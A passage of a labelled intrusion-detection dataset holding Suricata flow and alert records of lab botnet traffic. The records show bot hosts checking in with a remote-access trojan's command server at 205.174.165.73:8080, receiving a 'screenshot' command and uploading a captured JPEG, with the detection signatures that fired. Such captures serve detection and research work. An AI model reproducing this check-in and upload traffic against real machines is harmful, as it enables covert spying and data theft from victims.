'flow_id': 1173383112867681, 'pcap_cnt': 4460362, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51585, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:24:48.966497+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGHpAAIAGpKfAqAoOza6lScmBH5AKS857n8r2K1ARAQAZVgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:24:49.089414+0000', 'flow_id': 1173383112867681, 'pcap_cnt': 4460362, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51585, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:24:48.966497+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGHpAAIAGpKfAqAoOza6lScmBH5AKS857n8r2K1ARAQAZVgAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,248,108 |
192.168.10.9-2572-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4462897, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:24:56 | 67,208 | Friday | [{'timestamp': '2017-07-07T13:24:56.897882+0000', 'flow_id': 249591482593288, 'pcap_cnt': 4462897, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2572, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:24:56.831496+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoMSBAAIAGjAbAqAoJza6lSQoMH5Dt8LHVw9MaQlARAQDJsQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:24:56.897882+0000', 'flow_id': 249591482593288, 'pcap_cnt': 4462897, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2572, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:24:56.831496+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoMSBAAIAGjAbAqAoJza6lSQoMH5Dt8LHVw9MaQlARAQDJsQAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 308 | attack | 1,248,218 |
192.168.10.14-51586-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4463102, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:24:59 | 64,815 | Friday | [{'timestamp': '2017-07-07T13:24:59.155771+0000', 'flow_id': 2003419903256169, 'pcap_cnt': 4463102, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51586, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:24:59.091753+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGH9AAIAGpKLAqAoOza6lScmCH5ANuwEM4G+0/VARAQDj3QAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:24:59.155771+0000', 'flow_id': 2003419903256169, 'pcap_cnt': 4463102, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51586, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:24:59.091753+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGH9AAIAGpKLAqAoOza6lScmCH5ANuwEM4G+0/VARAQDj3QAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,248,224 |
192.168.10.14-51587-205.174.165.73-8080-6 | ['flow', 'http', 'fileinfo'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 6, flow_pkts_toclient: 5, flow_bytes_toserver: 555, flow_bytes_toclient: 433, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4464715, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 10 ; pcap_cnt: 4464717, event_type: fileinfo, proto: TCP, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 10, app_proto: http, fileinfo_filename: /api/pop, fileinfo_gaps: False, fileinfo_state: CLOSED, fileinfo_stored: False, fileinfo_size: 10, fileinfo_tx_id: 0 | true | Botnet | true | 13:25:09 | 202,057 | Friday | [{'timestamp': '2017-07-07T13:25:09.358500+0000', 'flow_id': 1660655743887437, 'pcap_cnt': 4464715, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51587, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 10, 'http_response_body_printable': 'screenshot', 'http_response_body': 'c2NyZWVuc2hvdA=='}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 4, 'bytes_toserver': 435, 'bytes_toclient': 373, 'start': '2017-07-07T13:25:09.157773+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGIRAAIAGpJ3AqAoOza6lScmDH5C4Cw+a0GpKIlAQAQCl3wAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:25:09.358500+0000', 'flow_id': 1660655743887437, 'pcap_cnt': 4464715, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51587, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 10, 'http_response_body_printable': 'screenshot', 'http_response_body': 'c2NyZWVuc2hvdA=='}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 4, 'bytes_toserver': 435, 'bytes_toclient': 373, 'start': '2017-07-07T13:25:09.157773+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGIRAAIAGpJ3AqAoOza6lScmDH5C4Cw+a0GpKIlAQAQCl3wAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 507 | attack | 1,248,245 |
192.168.10.14-51588-205.174.165.73-8080-6 | ['flow', 'http', 'fileinfo'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 28, flow_pkts_toclient: 54, flow_bytes_toserver: 116630, flow_bytes_toclient: 3368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: ET.formdata, metadata_flowbits_1: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4464806, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: ET.formdata, metadata_flowbits_1: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/upload, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: POST, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 ; pcap_cnt: 4464806, event_type: fileinfo, proto: TCP, metadata_flowbits_0: ET.formdata, metadata_flowbits_1: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/upload, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: POST, http_protocol: HTTP/1.1, http_status: 200, http_length: 0, app_proto: http, fileinfo_filename: rBpRN.jpg, fileinfo_gaps: False, fileinfo_state: CLOSED, fileinfo_stored: False, fileinfo_size: 4987, fileinfo_tx_id: 0 | true | Botnet | true | 13:25:09 | 161,522 | Friday | {'timestamp': '2017-07-07T13:25:09.533997+0000', 'flow_id': 1437210070294525, 'pcap_cnt': 4464728, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51588, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['ET.formdata', 'http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/upload', 'http_user_agent': 'python-requests/2.18.1', 'http_method': 'POST', 'protocol': 'HTTP/1.1', 'length': 0, 'http_request_body_printable': '--29279c99423e410cbb3731445c5fa96b\r\nContent-Disposition: form-data; name="src"\r\n\r\nrBpRN.jpg\r\n--29279c99423e410cbb3731445c5fa96b\r\nContent-Disposition: form-data; name="botid"\r\n\r\nmitacs-pc5\r\n--29279c99423e410cbb3731445c5fa96b\r\nContent-Disposition: form-data; name="uploaded"; filename="rBpRN.jpg"\r\n\r\n......JFIF.............C..............\n..\r................. $.\' ",#..(7),01444.\'9=82<.342...C........\r\r.2!.!22222222222222222222222222222222222222222222222222..........."......................................\n.....................}........!1A..Qa."q.2....#B...R..$3br..\n.....%&\'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz........................................................................................................\n.....................w.......!1..AQ.aq."2...B.....#3R..br.\n.$4.%.....&\'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j(..\n(.......t.&..1%.....=.A..?.D.F..]...*N..t..N........5.6..$...C............I.m.......2M]..%oR$.mE...$...Z...y3 ......-.......T..l.^$..3@.)..vG.:.....h...6..U..F.s#*.\\e...9..)....{.?-.\'...N3.6..;...z..g.%.....*.w...`...........k6.V.L...."ln\\.\\...\'.q.._...\rf.......B..3|..s', 'http_request_body': 'LS0yOTI3OWM5OTQyM2U0MTBjYmIzNzMxNDQ1YzVmYTk2Yg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJzcmMiDQoNCnJCcFJOLmpwZw0KLS0yOTI3OWM5OTQyM2U0MTBjYmIzNzMxNDQ1YzVmYTk2Yg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJib3RpZCINCg0KbWl0YWNzLXBjNQ0KLS0yOTI3OWM5OTQyM2U0MTBjYmIzNzMxNDQ1YzVmYTk2Yg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ1cGxvYWRlZCI7IGZpbGVuYW1lPSJyQnBSTi5qcGciDQoNCv/Y/+AAEEpGSUYAAQEAAAEAAQAA/9sAQwAIBgYHBgUIBwcHCQkICgwUDQwLCwwZEhMPFB0aHx4dGhwcICQuJyAiLCMcHCg3KSwwMTQ0NB8nOT04MjwuMzQy/9sAQwEJCQkMCwwYDQ0YMiEcITIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy/8AAEQgDAAQAAwEiAAIRAQMRAf/EAB8AAAEFAQEBAQEBAAAAAAAAAAABAgMEBQYHCAkKC//EALUQAAIBAwMCBAMFBQQEAAABfQECAwAEEQUSITFBBhNRYQcicRQygZGhCCNCscEVUtHwJDNicoIJChYXGBkaJSYnKCkqNDU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6g4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2drh4uPk5ebn6Onq8fLz9PX29/j5+v/EAB8BAAMBAQEBAQEBAQEAAAAAAAABAgMEBQYHCAkKC//EALURAAIBAgQEAwQHBQQEAAECdwABAgMRBAUhMQYSQVEHYXETIjKBCBRCkaGxwQkjM1LwFWJy0QoWJDThJfEXGBkaJicoKSo1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoKDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uLj5OXm5+jp6vLz9PX29/j5+v/aAAwDAQACEQMRAD8A9GooooAKKKuSw6oL9NN0jybdljElzeyoHKk9FUH/AD+VROpGFr9dF5mlKk6krXS82U6K0LAC+gmt7zWdNv7zJMD2xUOQB/EAf5CsueaO2t5J5W2xxqXdsZwAMk1dpL4lb1Ikkm1Fp+a2JKKpHVrMGMF5MyDI/cvwCcAtx8oJBwTgHFSLf2zeXiTPmTNAvynl13ZH/jrc9OKBFmiqEes2ErFVnxhGk3MjKpRcZYMRgjkcjil/tezMe/M/LbQn2eTeTjP3Nu7GO+MUAXqKo2epJeXl3brFKht3C7mjYBvlB7gY69PTnoaQazYGVoxMxZWdDiJsblzuXOMFuCcdcc0AX6KztQ1m3sYY3AeYuUKrGjN8rMFz'}, 'files': [{'filename': 'rBpRN.jpg', 'sid': [], 'gaps': False, 'state': 'UNKNOWN', 'stored': False, 'size': 864, 'tx_id': 0}], 'app_proto': 'http', 'flow': {'pkts_toserver': 5, 'pkts_toclient': 2, 'bytes_toserver': 9048, 'bytes_toclient': 126, 'start': '2017-07-07T13:25:09.532477+0000'}, 'payload': 